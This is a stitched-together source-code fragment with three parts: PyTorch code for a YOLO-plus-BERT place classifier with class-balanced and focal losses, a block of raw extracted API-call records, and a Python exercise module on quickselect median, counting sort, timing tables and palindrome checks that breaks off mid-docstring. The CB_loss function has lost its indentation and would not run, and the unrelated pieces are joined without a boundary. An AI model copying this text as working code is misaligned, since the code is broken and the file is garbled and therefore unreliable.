        if entry[0].startswith('con'):
            entry[0] = 'convenience store'
        indices.append(label_dict[entry[0]])
    return indices
def label_remapping(target):
    """Map class indices back to place-name strings using the inverse of
    label_dict_wo_none."""
    index_to_name = {idx: name for name, idx in label_dict_wo_none.items()}
    return [index_to_name[class_idx] for class_idx in target]
def conv3x3(in_planes, out_planes, stride=1):
    """Build a bias-free 3x3 convolution with padding 1 (spatial size is
    preserved when stride == 1)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
def accuracy(output, target, topk=(1,)):
    """Computes the accuracy over the k top predictions for the specified values of k.

    Args:
        output: (batch, num_classes) tensor of class scores.
        target: (batch,) tensor of ground-truth class indices.
        topk: tuple of k values to report.

    Returns:
        List of scalar tensors, one per k, each the top-k accuracy in percent.
    """
    with torch.no_grad():
        maxk = max(topk)
        batch_size = target.size(0)
        _, pred = output.topk(maxk, 1, True, True)
        pred = pred.t()
        correct = pred.eq(target.view(1, -1).expand_as(pred))
        res = []
        for k in topk:
            # BUGFIX: correct[:k] is non-contiguous for k > 1, so .view(-1)
            # raises RuntimeError on current PyTorch; .reshape(-1) handles
            # both the contiguous and non-contiguous cases.
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
            res.append(correct_k.mul_(100.0 / batch_size))
        return res
def place_buffer(images_norm, buffer_images):
    """Left-pad *buffer_images* with the first frame of *images_norm* so it
    holds exactly 10 frames.

    An empty buffer is first seeded with *images_norm* itself; a buffer longer
    than 10 frames triggers the assertion.
    """
    frames = images_norm if len(buffer_images) == 0 else buffer_images
    missing = 10 - len(frames)
    if missing > 0:
        frames = [images_norm[0]] * missing + frames
    assert len(frames) == 10, 'Buffer failed'
    return frames
class AverageMeter(object):
    """Tracks the latest value and running average of a scalar metric."""

    def __init__(self, name, fmt=':f'):
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Clear all statistics back to zero."""
        self.val = self.avg = self.sum = self.count = 0

    def update(self, val, n=1):
        """Record *val* observed *n* times and refresh the running average."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count

    def __str__(self):
        template = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Formats and prints a '[batch/total]\\tmeter1\\tmeter2...' progress line."""

    def __init__(self, num_batches, meters, prefix=""):
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print the prefix, the current batch counter and every meter summary."""
        parts = [self.prefix + self.batch_fmtstr.format(batch)]
        parts.extend(str(meter) for meter in self.meters)
        print('\t'.join(parts))

    def _get_batch_fmtstr(self, num_batches):
        # Counter field width equals the digit count of the batch total.
        width = len(str(num_batches // 1))
        fmt = '{:' + str(width) + 'd}'
        return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input = logits,target = labels_one_hot, weights = weights)
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
def focal_loss(labels, logits, alpha, gamma):
    """Compute the focal loss between `logits` and the ground truth `labels`.

    Focal loss = -alpha_t * (1-pt)^gamma * log(pt), where pt is the predicted
    probability of the true class (pt = sigmoid(logit) for positives,
    1 - sigmoid(logit) otherwise).

    Args:
        labels: float tensor of size [batch, num_classes] (one-hot).
        logits: float tensor of size [batch, num_classes].
        alpha: float tensor of size [batch_size] specifying per-example
            weights for balanced cross entropy.
        gamma: float scalar modulating loss from hard and easy examples;
            0 reduces to weighted BCE.

    Returns:
        Scalar tensor: total weighted loss normalized by the number of
        positive labels.
    """
    per_element_bce = F.binary_cross_entropy_with_logits(input=logits, target=labels, reduction="none")
    if gamma == 0.0:
        modulator = 1.0
    else:
        # Numerically-stable form of (1 - pt)^gamma expressed via logits.
        log_one_plus_exp = torch.log(1 + torch.exp(-1.0 * logits))
        modulator = torch.exp(-gamma * labels * logits - gamma * log_one_plus_exp)
    weighted = alpha * (modulator * per_element_bce)
    total = torch.sum(weighted)
    total /= torch.sum(labels)
    return total
class place_model(nn.Module):
    """Place/scene classifier.

    Runs a YOLO-v2 backbone over every frame, compresses the feature map to a
    128-d per-frame descriptor, encodes the frame sequence with a small BERT
    encoder, and classifies each frame over 22 place classes after an
    attention-style weighted pooling driven by a learned per-frame "change"
    score.
    """

    def __init__(self, num_persons, num_faces, device):
        super(place_model, self).__init__()
        # Pretrained person-detection YOLO supplies the backbone weights.
        pre_model = Yolo(num_persons).cuda(device)
        num_face_cls = num_faces
        self.detector = YoloD(pre_model).cuda(device)
        # 1024-ch backbone map -> 128-ch place features (+ BN/LeakyReLU/pool).
        self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
                                        nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
        self.avgpool = nn.AvgPool2d(7, stride=1)
        # self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
        # self.bert_fc1 = torch.nn.Linear(128, 768)
        # self.bert_fc2 = torch.nn.Linear(768, 128)
        self.bert = BERT()
        self.fc2 = torch.nn.Linear(128, 1)   # per-frame scalar "change" score
        self.fc3 = torch.nn.Linear(128, 22)  # final 22-way place classifier
        self.softmax = torch.nn.Softmax(dim=1)  # NOTE(review): defined but unused in forward
        # # define face
        # self.face_conv = nn.Conv2d(
        #     1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)

    def forward(self, image):
        """Forward pass.

        Args:
            image: (N, T, C, H, W) batch of N clips of T frames each.

        Returns:
            Logits of shape (N*T, 22): one place prediction per frame.
        """
        N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
        # Fold the time axis into the batch so the detector sees plain images.
        image = image.reshape(N*T, C, H, W)
        # feature map of backbone
        fmap, output_1 = self.detector(image)
        fmap = self.place_conv(fmap)
        x = self.avgpool(fmap)
        x = x.reshape(N, T, -1)
        # self.lstm_sc.flatten_parameters()
        # N, T = x.size(0), x.size(1)
        # x = self.lstm_sc(x)[0]
        # x = self.bert_fc1(x)
        # Temporal encoding of the per-frame 128-d descriptors.
        x = self.bert(x)
        # x = self.bert_fc2(x)
        change = x.reshape(N*T, -1)
        #x = self.fc1(x)
        # Scalar "scene change" score for every frame.
        change = self.fc2(change)
        change = change.reshape(N, T)
        #x = x.reshape(N*T, -1)
        # The block below converts the change scores into per-frame pooling
        # weights using a numerically-stabilized construction (row max M is
        # subtracted before exponentiation) with triangular masks and a
        # cumulative sum.  NOTE(review): the exact weighting semantics of the
        # triu/tril/cumsum combination are intricate — treat this summary as
        # approximate and verify against the training code.
        M, _ = change.max(1)
        w = change - M.view(-1,1)
        w = w.exp()
        w = w.unsqueeze(1).expand(-1,w.size(1),-1)
        w = w.triu(1) - w.tril()
        w = w.cumsum(2)
        w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
        ww = w.new_empty(w.size())
        idx = M>=0
        ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
        idx = ~idx
        ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
        # Invert (with epsilon for stability) and normalize into weights.
        ww = (ww+1e-10).pow(-1)
        ww = ww/ww.sum(1,True)
        # Weighted mixture of BERT frame features, then per-frame classification.
        x = ww.transpose(1,2).bmm(x)
        x = x.reshape(N*T, -1)
        x = self.fc3(x)
        x = x.reshape(N*T, -1)
        return x
class BERT(nn.Module):
    """
    BERT model : Bidirectional Encoder Representations from Transformers.
    """

    def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
        """
        :param vocab_size: vocab_size of total words
        :param hidden: BERT model hidden size
        :param n_layers: numbers of Transformer blocks(layers)
        :param attn_heads: number of attention heads
        :param dropout: dropout rate
        """
        super(BERT, self).__init__()
        self.hidden = hidden
        self.n_layers = n_layers
        self.attn_heads = attn_heads
        # The paper uses 4 * hidden_size for the feed-forward network width.
        self.feed_forward_hidden = hidden * 4
        # Embedding layer (here only positional encoding + dropout).
        self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
        # Stack of identical transformer encoder blocks.
        self.transformer_blocks = nn.ModuleList(
            [TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _layer in range(n_layers)])

    def forward(self, x):
        """Embed the input sequence and run it through every transformer block
        (no attention masking is applied)."""
        hidden_states = self.embedding(x)
        for block in self.transformer_blocks:
            hidden_states = block.forward(hidden_states, None)
        return hidden_states
class BERTEmbedding(nn.Module):
    """Input embedding for this BERT variant.

    Only the sinusoidal positional signal is added to the (already
    continuous) input features, followed by dropout; token and segment
    embeddings from the original BERT are not used here.
    """

    def __init__(self, vocab_size, embed_size, dropout=0.):
        """
        :param vocab_size: total vocab size (unused; kept for API compatibility)
        :param embed_size: embedding size of token embedding
        :param dropout: dropout rate
        """
        super(BERTEmbedding, self).__init__()
        # self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
        # self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
        self.position = PositionalEmbedding(d_model=embed_size)
        self.dropout = nn.Dropout(p=dropout)
        self.embed_size = embed_size

    def forward(self, sequence):
        combined = sequence + self.position(sequence)
        return self.dropout(combined)
class PositionalEmbedding(nn.Module):
    """Fixed sinusoidal positional encodings, precomputed once in log space
    and served as a (1, seq_len, d_model) buffer slice in forward()."""

    def __init__(self, d_model, max_len=512):
        super(PositionalEmbedding, self).__init__()
        table = torch.zeros(max_len, d_model).float()
        table.require_grad = False  # constant buffer; never trained
        positions = torch.arange(0, max_len).float().unsqueeze(1)
        scale = -(math.log(10000.0) / d_model)
        frequencies = (torch.arange(0, d_model, 2).float() * scale).exp()
        # Even columns get sine, odd columns get cosine.
        table[:, 0::2] = torch.sin(positions * frequencies)
        table[:, 1::2] = torch.cos(positions * frequencies)
        self.register_buffer('pe', table.unsqueeze(0))

    def forward(self, x):
        # Return the encodings for the first x.size(1) positions.
        return self.pe[:, :x.size(1)]
class TransformerBlock(nn.Module):
    """
    Bidirectional Encoder = Transformer (self-attention)
    Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
    """

    def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
        """
        :param hidden: hidden size of transformer
        :param attn_heads: head sizes of multi-head attention
        :param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
        :param dropout: dropout rate
        """
        super(TransformerBlock, self).__init__()
        self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
        self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
        self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
        self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, x, mask):
        """Self-attention sublayer, then feed-forward sublayer, then dropout."""
        attended = self.input_sublayer(
            x, lambda hidden_states: self.attention.forward(hidden_states, hidden_states, hidden_states, mask=mask))
        transformed = self.output_sublayer(attended, self.feed_forward)
        return self.dropout(transformed)
class MultiHeadedAttention(nn.Module):
    """
    Multi-head scaled dot-product attention: project query/key/value with
    separate linear layers, split into `h` heads of width d_k, attend, then
    concatenate the heads and apply a final projection.
    """

    def __init__(self, h, d_model, dropout=0.1):
        super(MultiHeadedAttention, self).__init__()
        assert d_model % h == 0
        # We assume d_v always equals d_k.
        self.d_k = d_model // h
        self.h = h
        self.linear_layers = nn.ModuleList(nn.Linear(d_model, d_model) for _ in range(3))
        self.output_linear = nn.Linear(d_model, d_model)
        self.attention = Attention()
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, query, key, value, mask=None):
        batch_size = query.size(0)

        def split_heads(proj, tensor):
            # (batch, seq, d_model) -> (batch, h, seq, d_k)
            return proj(tensor).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)

        # 1) Linear projections, reshaped into per-head views.
        query = split_heads(self.linear_layers[0], query)
        key = split_heads(self.linear_layers[1], key)
        value = split_heads(self.linear_layers[2], value)

        # 2) Scaled dot-product attention applied to every head at once.
        x, _ = self.attention(query, key, value, mask=mask, dropout=self.dropout)

        # 3) Merge the heads back together and apply the output projection.
        x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
        return self.output_linear(x)
class Attention(nn.Module):
    """
    Scaled dot-product attention: softmax(Q K^T / sqrt(d_k)) V, with
    optional masking and dropout applied to the attention weights.
    """

    def __init__(self):
        super(Attention, self).__init__()

    def forward(self, query, key, value, mask=None, dropout=None):
        d_k = query.size(-1)
        # Similarity of every query against every key, scaled by sqrt(d_k).
        scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
        if mask is not None:
            # Masked positions receive -1e9 so softmax gives them ~zero weight.
            scores = scores.masked_fill(mask == 0, -1e9)
        p_attn = F.softmax(scores, dim=-1)
        if dropout is not None:
            p_attn = dropout(p_attn)
        return torch.matmul(p_attn, value), p_attn
class PositionwiseFeedForward(nn.Module):
    """Position-wise feed-forward network: w_2(dropout(ReLU(w_1(x))))."""

    def __init__(self, d_model, d_ff, dropout=0.1):
        super(PositionwiseFeedForward, self).__init__()
        self.w_1 = nn.Linear(d_model, d_ff)
        self.w_2 = nn.Linear(d_ff, d_model)
        self.dropout = nn.Dropout(dropout)
        # The original Transformer/BERT papers use GELU here; this variant
        # deliberately keeps ReLU.
        self.activation = nn.ReLU()

    def forward(self, x):
        """Expand to d_ff, activate and drop out, then project back to d_model."""
        hidden = self.activation(self.w_1(x))
        return self.w_2(self.dropout(hidden))
class SublayerConnection(nn.Module):
    """
    Pre-norm residual wrapper: x + dropout(sublayer(LayerNorm(x))).
    Note for code simplicity the norm is applied first rather than last.
    """

    def __init__(self, size, dropout):
        super(SublayerConnection, self).__init__()
        self.norm = nn.LayerNorm(size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x, sublayer):
        """Apply residual connection to any sublayer with the same size."""
        normalized = self.norm(x)
        return x + self.dropout(sublayer(normalized))
| [
"torch.nn.ReLU",
"torch.nn.Dropout",
"torch.sin",
"torch.exp",
"math.log",
"numpy.array",
"torch.cos",
"torch.sum",
"torch.nn.AvgPool2d",
"torch.nn.functional.softmax",
"torch.arange",
"torch.nn.BatchNorm2d",
"Yolo_v2_pytorch.src.yolo_tunning.YoloD",
"torch.nn.LayerNorm",
"torch.matmul",... | [((1750, 1839), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_planes', 'out_planes'], {'kernel_size': '(3)', 'stride': 'stride', 'padding': '(1)', 'bias': '(False)'}), '(in_planes, out_planes, kernel_size=3, stride=stride, padding=1,\n bias=False)\n', (1759, 1839), True, 'import torch.nn as nn\n'), ((6545, 6631), 'torch.nn.functional.binary_cross_entropy_with_logits', 'F.binary_cross_entropy_with_logits', ([], {'input': 'logits', 'target': 'labels', 'reduction': '"""none"""'}), "(input=logits, target=labels, reduction=\n 'none')\n", (6579, 6631), True, 'import torch.nn.functional as F\n'), ((6889, 6913), 'torch.sum', 'torch.sum', (['weighted_loss'], {}), '(weighted_loss)\n', (6898, 6913), False, 'import torch\n'), ((6933, 6950), 'torch.sum', 'torch.sum', (['labels'], {}), '(labels)\n', (6942, 6950), False, 'import torch\n'), ((1998, 2013), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2011, 2013), False, 'import torch\n'), ((4869, 4900), 'numpy.power', 'np.power', (['beta', 'samples_per_cls'], {}), '(beta, samples_per_cls)\n', (4877, 4900), True, 'import numpy as np\n'), ((4930, 4953), 'numpy.array', 'np.array', (['effective_num'], {}), '(effective_num)\n', (4938, 4953), True, 'import numpy as np\n'), ((7467, 7492), 'torch.nn.AvgPool2d', 'nn.AvgPool2d', (['(7)'], {'stride': '(1)'}), '(7, stride=1)\n', (7479, 7492), True, 'import torch.nn as nn\n'), ((7749, 7772), 'torch.nn.Linear', 'torch.nn.Linear', (['(128)', '(1)'], {}), '(128, 1)\n', (7764, 7772), False, 'import torch\n'), ((7792, 7816), 'torch.nn.Linear', 'torch.nn.Linear', (['(128)', '(22)'], {}), '(128, 22)\n', (7807, 7816), False, 'import torch\n'), ((7840, 7863), 'torch.nn.Softmax', 'torch.nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (7856, 7863), False, 'import torch\n'), ((12019, 12040), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (12029, 12040), True, 'import torch.nn as nn\n'), ((12750, 12780), 'torch.sin', 'torch.sin', (['(position * div_term)'], 
{}), '(position * div_term)\n', (12759, 12780), False, 'import torch\n'), ((12803, 12833), 'torch.cos', 'torch.cos', (['(position * div_term)'], {}), '(position * div_term)\n', (12812, 12833), False, 'import torch\n'), ((13901, 13922), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (13911, 13922), True, 'import torch.nn as nn\n'), ((14586, 14613), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_model'], {}), '(d_model, d_model)\n', (14595, 14613), True, 'import torch.nn as nn\n'), ((14675, 14696), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (14685, 14696), True, 'import torch.nn as nn\n'), ((15790, 15815), 'torch.nn.functional.softmax', 'F.softmax', (['scores'], {'dim': '(-1)'}), '(scores, dim=-1)\n', (15799, 15815), True, 'import torch.nn.functional as F\n'), ((16140, 16164), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_ff'], {}), '(d_model, d_ff)\n', (16149, 16164), True, 'import torch.nn as nn\n'), ((16184, 16208), 'torch.nn.Linear', 'nn.Linear', (['d_ff', 'd_model'], {}), '(d_ff, d_model)\n', (16193, 16208), True, 'import torch.nn as nn\n'), ((16232, 16251), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (16242, 16251), True, 'import torch.nn as nn\n'), ((16315, 16324), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (16322, 16324), True, 'import torch.nn as nn\n'), ((16704, 16722), 'torch.nn.LayerNorm', 'nn.LayerNorm', (['size'], {}), '(size)\n', (16716, 16722), True, 'import torch.nn as nn\n'), ((16746, 16765), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (16756, 16765), True, 'import torch.nn as nn\n'), ((4978, 4993), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (4984, 4993), True, 'import numpy as np\n'), ((5094, 5115), 'torch.tensor', 'torch.tensor', (['weights'], {}), '(weights)\n', (5106, 5115), False, 'import torch\n'), ((5506, 5598), 'torch.nn.functional.binary_cross_entropy_with_logits', 'F.binary_cross_entropy_with_logits', ([], 
{'input': 'logits', 'target': 'labels_one_hot', 'weights': 'weights'}), '(input=logits, target=labels_one_hot,\n weights=weights)\n', (5540, 5598), True, 'import torch.nn.functional as F\n'), ((7285, 7326), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1024)', '(128)', '(3)', '(1)', '(1)'], {'bias': '(False)'}), '(1024, 128, 3, 1, 1, bias=False)\n', (7294, 7326), True, 'import torch.nn as nn\n'), ((7328, 7347), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(128)'], {}), '(128)\n', (7342, 7347), True, 'import torch.nn as nn\n'), ((7391, 7422), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.1)'], {'inplace': '(True)'}), '(0.1, inplace=True)\n', (7403, 7422), True, 'import torch.nn as nn\n'), ((7424, 7442), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)', '(2)'], {}), '(2, 2)\n', (7436, 7442), True, 'import torch.nn as nn\n'), ((15902, 15929), 'torch.matmul', 'torch.matmul', (['p_attn', 'value'], {}), '(p_attn, value)\n', (15914, 15929), False, 'import torch\n'), ((7125, 7142), 'Yolo_v2_pytorch.src.yolo_net.Yolo', 'Yolo', (['num_persons'], {}), '(num_persons)\n', (7129, 7142), False, 'from Yolo_v2_pytorch.src.yolo_net import Yolo\n'), ((7215, 7231), 'Yolo_v2_pytorch.src.yolo_tunning.YoloD', 'YoloD', (['pre_model'], {}), '(pre_model)\n', (7220, 7231), False, 'from Yolo_v2_pytorch.src.yolo_tunning import YoloD\n'), ((12495, 12524), 'torch.zeros', 'torch.zeros', (['max_len', 'd_model'], {}), '(max_len, d_model)\n', (12506, 12524), False, 'import torch\n'), ((14509, 14536), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_model'], {}), '(d_model, d_model)\n', (14518, 14536), True, 'import torch.nn as nn\n'), ((5032, 5064), 'torch.nn.functional.one_hot', 'F.one_hot', (['labels', 'no_of_classes'], {}), '(labels, no_of_classes)\n', (5041, 5064), True, 'import torch.nn.functional as F\n'), ((12585, 12609), 'torch.arange', 'torch.arange', (['(0)', 'max_len'], {}), '(0, max_len)\n', (12597, 12609), False, 'import torch\n'), ((6780, 6804), 'torch.exp', 'torch.exp', (['(-1.0 * logits)'], {}), 
'(-1.0 * logits)\n', (6789, 6804), False, 'import torch\n'), ((12651, 12678), 'torch.arange', 'torch.arange', (['(0)', 'd_model', '(2)'], {}), '(0, d_model, 2)\n', (12663, 12678), False, 'import torch\n'), ((12691, 12708), 'math.log', 'math.log', (['(10000.0)'], {}), '(10000.0)\n', (12699, 12708), False, 'import os, sys, math\n')] |
"""
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
    """
    Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
    ends and idx must be valid index. Count the number of comparisons
    by populating A with RecordedItem instances.

    Hoare-style partition: on return the pivot (originally A[idx]) sits at
    the returned index j; everything left of j compared no greater than the
    pivot and everything right of j no smaller. The exact sequence of '<'
    comparisons is observable through RecordedItem, so callers may depend
    on this particular implementation's comparison count.
    """
    if lo == hi:
        return lo
    A[idx],A[lo] = A[lo],A[idx]    # swap pivot into position A[lo]
    i = lo
    j = hi + 1
    while True:
        while True:
            i += 1
            if i == hi: break          # ran off the right end of the window
            if A[lo] < A[i]: break     # A[i] belongs on the pivot's right
        while True:
            j -= 1
            if j == lo: break          # ran off the left end of the window
            if A[j] < A[lo]: break     # A[j] belongs on the pivot's left
        # doesn't count as comparing two values
        if i >= j: break
        A[i],A[j] = A[j],A[i]          # swap the out-of-place pair
    A[lo],A[j] = A[j],A[lo]            # move pivot into its final slot
    return j
def linear_median(A):
    """
    Efficient implementation that returns median value in arbitrary list,
    assuming A has an odd number of values. Note this algorithm will
    rearrange values in A.

    Quickselect: repeatedly partition around a randomly chosen pivot and
    narrow the [lo, hi] window to whichever side holds the middle index.
    """
    # if len(A) % 2 == 0:
    #     raise ValueError('linear_median() only coded to work with odd number of values.')
    lo, hi = 0, len(A) - 1
    target = hi // 2
    while lo < hi:
        pivot_idx = random.randint(lo, hi)     # select valid index randomly
        split = partition(A, lo, hi, pivot_idx)
        if split == target:
            return A[split]
        if split < target:
            lo = split + 1
        else:
            hi = split - 1
    return A[lo]
def median_from_sorted_list(A):
    """Return the median of A by sorting a copy (A itself is not mutated)."""
    ordered = sorted(A)
    count = len(A)
    mid = count // 2
    if count % 2:
        # Odd count: the middle element is the median.
        return ordered[mid]
    # Even count: average the two middle elements.
    return (ordered[mid - 1] + ordered[mid]) / 2
def counting_sort(A, M):
    """
    Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 to and not including M.
    """
    # Histogram of value frequencies.
    counts = [0] * M
    for value in A:
        counts[value] += 1

    # Write each value back `count` times, one slot at a time.
    write_at = 0
    for value, count in enumerate(counts):
        for offset in range(count):
            A[write_at + offset] = value
        write_at += count
def counting_sort_improved(A, M):
    """
    Update A in place to be sorted in ascending order if all elements
    are guaranteed to be in the range 0 to and not including M.
    Each run of equal values is written with one slice assignment.
    """
    counts = [0] * M
    for value in A:
        counts[value] += 1

    start = 0
    for value, count in enumerate(counts):
        if count:
            end = start + count
            A[start:end] = [value] * count
            start = end
def run_counting_sort_trials(max_k=15, output=True):
    """Generate table for counting sort up to (but not including) max_k=15.

    Times counting_sort vs counting_sort_improved on shuffled lists of
    N = 2^8 .. 2^(max_k-1) values drawn from range(M), taking the minimum
    of 100 single-shot runs for each. Returns the populated DataTable.
    """
    tbl = DataTable([8,15,15],
                    ['N', 'counting_sort', 'counting_sort_improved'], output=output)
    M = 20 # arbitrary value, and results are dependent on this value.
    trials = [2**k for k in range(8, max_k)]
    for n in trials:
        # Time the basic counting sort; is_sorted(a) validates each run.
        t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
                setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
        # Same timing protocol for the slice-assignment variant.
        t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
                setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
        tbl.row([n, t_cs, t_csi])
    return tbl
def run_median_trial():
    """Generate table for Median Trial.

    Compares linear_median (randomized quickselect) against
    median_from_sorted_list (sort-based) on shuffled lists of N = 2^k + 1
    values; reported numbers are milliseconds per run (best of 10 repeats
    of 5 runs each). Returns the populated DataTable.
    """
    tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])
    trials = [2**k+1 for k in range(8,20)]
    for n in trials:
        # The assert inside the timed statement doubles as a correctness
        # check: the median of shuffled range(n) is n//2.
        t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
                setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
        t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
                setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
        tbl.row([n, t_med, t_sort])
    return tbl
def run_median_less_than_trial(max_k=20, output=True):
    """Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20.

    Wraps each value in a RecordedItem so every '<' comparison is tallied,
    then compares the comparison counts of the sort-based median against
    randomized quickselect on lists of N = 2^k + 1 items. Returns the
    populated DataTable.
    """
    tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
    tbl.format('median_count', ',d')
    tbl.format('sort_median_count', ',d')
    trials = [2**k+1 for k in range(8, max_k)]
    for n in trials:
        A = list([RecordedItem(i) for i in range(n)])
        random.shuffle(A)
        # Generated external sorted to reuse list
        RecordedItem.clear()
        med2 = median_from_sorted_list(A)
        # report()[1] is the tally of '<' comparisons since the last clear().
        sort_lt = RecordedItem.report()[1]
        RecordedItem.clear()
        med1 = linear_median(A)
        lin_lt = RecordedItem.report()[1]
        # Both strategies must agree on the median value.
        assert med1 == med2
        tbl.row([n, lin_lt, sort_lt])
    return tbl
def is_palindrome1(w):
    """Check palindrome by comparing w with its negative-step slice reversal."""
    reversed_w = w[::-1]
    return reversed_w == w
def is_palindrome2(w):
    """Peel matching characters off both ends until mismatch or exhaustion."""
    remaining = w
    while len(remaining) > 1:
        if remaining[0] != remaining[-1]:
            return False                  # ends disagree: not a palindrome
        remaining = remaining[1:-1]       # strip both ends and repeat
    return True                           # 0 or 1 characters left: palindrome
def is_palindrome3(w):
    """Compare mirrored positions from both ends without copying the string."""
    # w[-(k+1)] is the character mirroring w[k]; checking the first half
    # suffices (an odd-length middle character always matches itself).
    return all(w[k] == w[-(k + 1)] for k in range(round(len(w) / 2)))
def is_palindrome_letters_only(s):
    """
    Confirm Palindrome, even when string contains non-alphabet letters
    and ignore capitalization.

    Bug fix: the original skip loops broke out at the window boundaries and
    could then compare two *non-letter* characters, so a string with no
    letters at all (e.g. '!?') wrongly returned False. Guarding every skip
    with `i < j` means non-letters can never take part in a comparison; a
    string without letters is trivially a palindrome.

    casefold() method, which was introduced in Python 3.3, could be
